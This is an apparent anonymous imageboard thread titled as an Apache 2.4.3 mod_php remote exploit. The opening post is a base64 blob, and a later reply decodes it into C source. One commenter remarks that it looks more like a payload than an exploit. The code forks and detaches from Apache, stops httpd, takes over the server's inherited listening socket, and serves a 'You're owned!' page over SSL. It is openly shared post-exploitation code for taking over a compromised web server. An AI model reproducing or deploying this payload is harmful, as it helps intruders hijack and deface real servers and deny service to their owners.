Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

Apache 2.4.3 mod_php remote exploit

Name: Anonymous 2013-02-20 14:51

I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5o
PgojaW5jbHVkZSA8c2lnbmFsLmg+CiNpbmNsdWRlIDxlcnJuby5oPgojaW5jbHVkZSA8c3lzL3Nl
bGVjdC5oPgojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8b3BlbnNzbC9zc2wuaD4K
Ci8qCiAqIFRoZSBiYXNpYyBhY3Rpb25zIGFyZSBsaWtlIHRoaXM6CiAqICAgICAgMSkgQmVjb21l
IHNlc3Npb24gbGVhZGVyCiAqICAgICAgMikgR2V0IHJpZCBvZiB0aGUgcGFyZW50IChhcGFjaGUp
CiAqICAgICAgMykgU3RhcnQgaGFuZGxpbmcgcmVxdWVzdHMKICovCgojZGVmaW5lIExJU1RFTl9E
RVNDUklQVE9SIDQKI2RlZmluZSBDRVJURiAiL3Zhci93d3cvaHRtbC9mb28tY2VydC5wZW0iCiNk
ZWZpbmUgS0VZRiAgIi92YXIvd3d3L2h0bWwvZm9vLWNlcnQucGVtIgoKc3RhdGljIFNTTF9DVFgg
ICAgKmN0eDsKc3RhdGljIFNTTCAgICAgICAgKnNzbDsKc3RhdGljIFg1MDkgICAgICAgKmNsaWVu
dF9jZXJ0OwpzdGF0aWMgU1NMX01FVEhPRCAqbWV0aDsKCnN0YXRpYyB2b2lkIHNlcnZlcl9sb29w
KGludCBkZXNjcik7CnN0YXRpYyB2b2lkIHNzbF9pbml0KHZvaWQpOwoKaW50IG1haW4oaW50IGFy
Z2MsIGNoYXIgKmFyZ3ZbXSkKewogICAgLyogTmVlZCB0byBmb3JrIHNvIGFwYWNoZSBkb2Vzbid0
IGtpbGwgdXMgKi8KICAgIGlmIChmb3JrKCkgPT0gMCkgewogICAgICAgIC8qIEJlY29tZSBzZXNz
aW9uIGxlYWRlciAqLwogICAgICAgIHNldHNpZCgpOwogICAgICAgIHNsZWVwKDIpOwoKICAgICAg
ICAvKiBqdXN0IGluIGNhc2Ugb25lIHdhcyBhIGNvbnRyb2xsaW5nIHR0eSAqLwogICAgICAgIGNs
b3NlKDApOyBjbG9zZSgxKTsgY2xvc2UoMik7CiAgICAgICAgc3NsX2luaXQoKTsKICAgICAgICBz
ZXJ2ZXJfbG9vcChMSVNURU5fREVTQ1JJUFRPUik7CiAgICB9CiAgICBlbHNlCiAgICB7CiAgICAg
ICAgc2xlZXAoMSk7CiAgICAgICAgc3lzdGVtKCIvdXNyL3NiaW4vaHR0cGQgLWsgc3RvcCIpOwog
ICAgICAgIHNsZWVwKDEpOwogICAgfQogICAgcmV0dXJuIDA7Cn0KCnN0YXRpYyB2b2lkIHNlcnZl
cl9sb29wKGludCBkZXNjcikKewogICAgc3RydWN0IHRpbWV2YWwgICB0djsKICAgIGZkX3NldCBy
ZWFkX21hc2sgOwoKICAgIEZEX1pFUk8oJnJlYWRfbWFzayk7CiAgICBGRF9TRVQoZGVzY3IsICZy
ZWFkX21hc2spOwogICAgZm9yICg7OykgewogICAgICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByZW1v
dGU7CiAgICAgICAgc29ja2xlbl90IGxlbiA9IHNpemVvZihyZW1vdGUpOwogICAgICAgIGludCBm
ZDsKCiAgICAgICAgaWYgKHNlbGVjdChkZXNjcisxLCAmcmVhZF9tYXNrLCBOVUxMLCBOVUxMLCAw
ICkgPT0gLTEpCiAgICAgICAgICAgIGNvbnRpbnVlOwogICAgICAgIGZkID0gYWNjZXB0KGRlc2Ny
LCAmcmVtb3RlLCAmbGVuKTsKICAgICAgICBpZiAoZmQgPj0wKSB7CiAgICAgICAgICAgIGNoYXIg
b2J1ZlsxMDI0XTsKICAgICAgICAgICAgaWYgKChzc2wgPSBTU0xfbmV3IChjdHgpKSAhPSBOVUxM
KSB7CiAgICAgICAgICAgICAgICBTU0xfc2V0X2ZkIChzc2wsIGZkKTsKICAgICAgICAgICAgICAg
IFNTTF9zZXRfYWNjZXB0X3N0YXRlKHNzbCk7CiAgICAgICAgICAgICAgICBpZiAoKFNTTF9hY2Nl
cHQgKHNzbCkpID09IC0xKQogICAgICAgICAgICAgICAgICAgICAgICBleGl0KDEpOwoKICAgICAg
ICAgICAgICAgIHN0cmNweShvYnVmLCAiSFRUUC8xLjAgMjAwIE9LXG4iKTsKICAgICAgICAgICAg
ICAgIHN0cmNhdChvYnVmLCAiQ29udGVudC1MZW5ndGg6IDQwXG4iKTsKICAgICAgICAgICAgICAg
IHN0cmNhdChvYnVmLCAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWxcblxuIik7CiAgICAgICAgICAg
ICAgICBzdHJjYXQob2J1ZiwgIjxodG1sPjxib2R5PllvdSdyZSBvd25lZCE8L2JvZHk+PC9odG1s
PiIpOwogICAgICAgICAgICAgICAgU1NMX3dyaXRlIChzc2wsIG9idWYsIHN0cmxlbihvYnVmKSk7
CiAgICAgICAgICAgICAgICBTU0xfc2V0X3NodXRkb3duKHNzbCwKICAgICAgICAgICAgICAgICAg
ICAgICAgU1NMX1NFTlRfU0hVVERPV058U1NMX1JFQ0VJVkVEX1NIVVRET1dOKTsKICAgICAgICAg
ICAgICAgIFNTTF9mcmVlIChzc2wpOwogICAgICAgICAgICAgICAgRVJSX3JlbW92ZV9zdGF0ZSgw
KTsKICAgICAgICAgICAgfQogICAgICAgICAgICBjbG9zZShmZCk7CiAgICAgICAgfQogICAgfQog
ICAgU1NMX0NUWF9mcmVlIChjdHgpOyAgLyogTmV2ZXIgZ2V0cyBjYWxsZWQgKi8KfQoKc3RhdGlj
IHZvaWQgc3NsX2luaXQodm9pZCkKewogICAgICAgIFNTTF9sb2FkX2Vycm9yX3N0cmluZ3MoKTsK
ICAgICAgICBTU0xlYXlfYWRkX3NzbF9hbGdvcml0aG1zKCk7CiAgICAgICAgbWV0aCA9IFNTTHYy
M19zZXJ2ZXJfbWV0aG9kKCk7CiAgICAgICAgY3R4ID0gU1NMX0NUWF9uZXcgKG1ldGgpOwogICAg
ICAgIGlmICghY3R4KQogICAgICAgICAgICAgICAgZXhpdCgxKTsKICAgICAgICBpZiAoU1NMX0NU
WF91c2VfY2VydGlmaWNhdGVfZmlsZShjdHgsIENFUlRGLAogICAgICAgICAgICAgICAgICAgICAg
ICBTU0xfRklMRVRZUEVfUEVNKSA8PSAwKQogICAgICAgICAgICAgICAgZXhpdCgxKTsKICAgICAg
ICBpZiAoU1NMX0NUWF91c2VfUHJpdmF0ZUtleV9maWxlKGN0eCwgS0VZRiwKICAgICAgICAgICAg
ICAgICAgICAgICAgU1NMX0ZJTEVUWVBFX1BFTSkgPD0gMCkKICAgICAgICAgICAgICAgIGV4aXQo
MSk7CiAgICAgICAgaWYgKCFTU0xfQ1RYX2NoZWNrX3ByaXZhdGVfa2V5KGN0eCkpCiAgICAgICAg
ICAgICAgICBleGl0KDEpOwp9Cgo=

Name: Anonymous 2013-02-20 18:16

IHBT.

Name: Anonymous 2013-02-20 18:43

Is this is text? Or a Binary file? We know PHP is broken by default.

Name: Anonymous 2013-02-20 20:14

It's a base 64 encoded C file. The C file looks more like a payload for an exploit than an actual exploit.

Name: Anonymous 2013-02-20 21:37

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <openssl/ssl.h>

/*
 * The basic actions are like this:
 *      1) Become session leader
 *      2) Get rid of the parent (apache)
 *      3) Start handling requests
 */

#define LISTEN_DESCRIPTOR 4
#define CERTF "/var/www/html/foo-cert.pem"
#define KEYF  "/var/www/html/foo-cert.pem"

static SSL_CTX    *ctx;
static SSL        *ssl;
static X509       *client_cert;
static SSL_METHOD *meth;

static void server_loop(int descr);
static void ssl_init(void);

int main(int argc, char *argv[])
{
    /* Need to fork so apache doesn't kill us */
    if (fork() == 0) {
        /* Become session leader */
        setsid();
        sleep(2);

        /* just in case one was a controlling tty */
        close(0); close(1); close(2);
        ssl_init();
        server_loop(LISTEN_DESCRIPTOR);
    }
    else
    {
        sleep(1);
        system("/usr/sbin/httpd -k stop");
        sleep(1);
    }
    return 0;
}

static void server_loop(int descr)
{
    struct timeval   tv;
    fd_set read_mask ;

    FD_ZERO(&read_mask);
    FD_SET(descr, &read_mask);
    for (;;) {
        struct sockaddr_in remote;
        socklen_t len = sizeof(remote);
        int fd;

        if (select(descr+1, &read_mask, NULL, NULL, 0 ) == -1)
            continue;
        fd = accept(descr, &remote, &len);
        if (fd >=0) {
            char obuf[1024];
            if ((ssl = SSL_new (ctx)) != NULL) {
                SSL_set_fd (ssl, fd);
                SSL_set_accept_state(ssl);
                if ((SSL_accept (ssl)) == -1)
                        exit(1);

                strcpy(obuf, "HTTP/1.0 200 OK\n");
                strcat(obuf, "Content-Length: 40\n");
                strcat(obuf, "Content-Type: text/html\n\n");
                strcat(obuf, "<html><body>You're owned!</body></html>");
                SSL_write (ssl, obuf, strlen(obuf));
                SSL_set_shutdown(ssl,
                        SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
                SSL_free (ssl);
                ERR_remove_state(0);
            }
            close(fd);
        }
    }
    SSL_CTX_free (ctx);  /* Never gets called */
}

static void ssl_init(void)
{
        SSL_load_error_strings();
        SSLeay_add_ssl_algorithms();
        meth = SSLv23_server_method();
        ctx = SSL_CTX_new (meth);
        if (!ctx)
                exit(1);
        if (SSL_CTX_use_certificate_file(ctx, CERTF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
                        SSL_FILETYPE_PEM) <= 0)
                exit(1);
        if (!SSL_CTX_check_private_key(ctx))
                exit(1);
}
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -